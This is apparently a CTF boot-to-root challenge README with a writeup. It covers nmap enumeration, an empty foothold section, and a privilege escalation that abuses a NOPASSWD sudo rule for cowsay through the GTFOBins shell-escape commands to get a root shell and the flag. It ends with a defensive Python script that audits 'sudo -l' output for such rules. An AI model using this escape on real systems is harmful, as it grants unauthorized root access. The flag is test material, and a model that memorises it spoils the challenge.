# JI EPITA - CTF

#### Challenge Type : boot to root (box)

#### Difficulty : easy

----

## Running the challenge.

You can run the challenge using docker.

### with Docker compose

```
cd docker
sudo docker compose up --build
```

### Building and running the docker image

_todo_

```
```

## Writeup

### Enum

Scan the IP with nmap for open ports:

```
nmap -p- ip
```

Ports 22 and 31337 are open.

We find that there is a web service on port 31337.

### Foothold

...

### Privesc

We can see that the user is allowed to run `/usr/games/cowsay` as root using sudo without a password.

```
User l33t may run the following commands on srv1prod:
(ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
```

Using GTFOBins, we identified that we can spawn a root shell thanks to this misconfiguration.

[https://gtfobins.github.io/gtfobins/cowsay/](https://gtfobins.github.io/gtfobins/cowsay/)

```
TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
sudo cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
epita{th3-sup3r-c0ws4y}
```

Solved !
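
The sudo rule abused in the Privesc step can be caught by auditing `sudo -l` output. The following Python code is an added example, not part of the original writeup: it parses the listing quoted above and flags rules that grant a program able to run other code. The `ESCAPABLE` set (a small illustrative subset of GTFOBins entries) and the function name `audit_sudo_listing` are assumptions.

```python
import os
import re

# Constructed sample: the `sudo -l` output quoted in the writeup above.
SAMPLE = """User l33t may run the following commands on srv1prod:
    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
"""

# Assumption: an illustrative subset of programs GTFOBins lists as able to
# run other code when invoked through sudo; extend it from your own baseline.
ESCAPABLE = {"cowsay", "cowthink", "vim", "less", "find", "awk", "perl", "python3"}

HEADER = re.compile(r"^User (\S+) may run the following commands on (\S+):")
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def audit_sudo_listing(text):
    """Return one finding dict per risky command in `sudo -l` output."""
    findings = []
    user = host = None
    for line in text.splitlines():
        header = HEADER.match(line)
        if header:
            user, host = header.groups()
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        runas, tags, commands = rule.groups()
        nopasswd = "NOPASSWD:" in tags
        # sudoers escapes literal commas inside arguments as "\,".
        for command in re.split(r"(?<!\\),", commands):
            argv = command.split()
            if not argv:
                continue
            name = os.path.basename(argv[0])
            if argv[0] == "ALL":
                reason = "unrestricted command set"
            elif name in ESCAPABLE:
                # A rule with no arguments lets the caller pass any arguments.
                args = "any arguments" if len(argv) == 1 else "pinned arguments"
                reason = f"{name} can execute other code ({args})"
            else:
                continue
            findings.append({"user": user, "host": host, "runas": runas.strip(),
                             "command": command.strip(), "nopasswd": nopasswd,
                             "reason": reason})
    return findings
```

On a real host, feed it the output of `sudo -l -U <user>` for each account; the fix for a finding like this one is to remove the rule from sudoers.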